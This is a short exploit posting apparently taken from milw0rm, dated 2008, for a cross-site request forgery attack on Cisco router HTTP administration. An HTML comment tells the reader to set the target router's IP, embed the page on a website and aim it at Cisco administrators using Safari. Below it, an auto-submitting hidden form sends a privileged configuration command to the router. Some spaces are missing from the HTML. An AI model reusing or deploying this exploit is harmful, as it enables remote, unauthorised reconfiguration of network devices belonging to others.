<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2
Replace "10.10.10.1" with the IP address of the target router, embed this in a web
page and hope for the best. Cisco Admin's + Safari are the best targets ;) --><html><body><bodyonload="fdsa.submit();"><formname=fdsamethod="post"action="http://10.10.10.1/level/15/exec/-/configure/http"><inputtype=hiddenname=commandvalue="alias exec xx xx"><inputtype=hiddenname=command_urlvalue="/level/15/exec/-"><inputtype=hiddenname=new_command_urlvalue="/level/15/configure/-"></body></html>
# milw0rm.com [2008-09-17]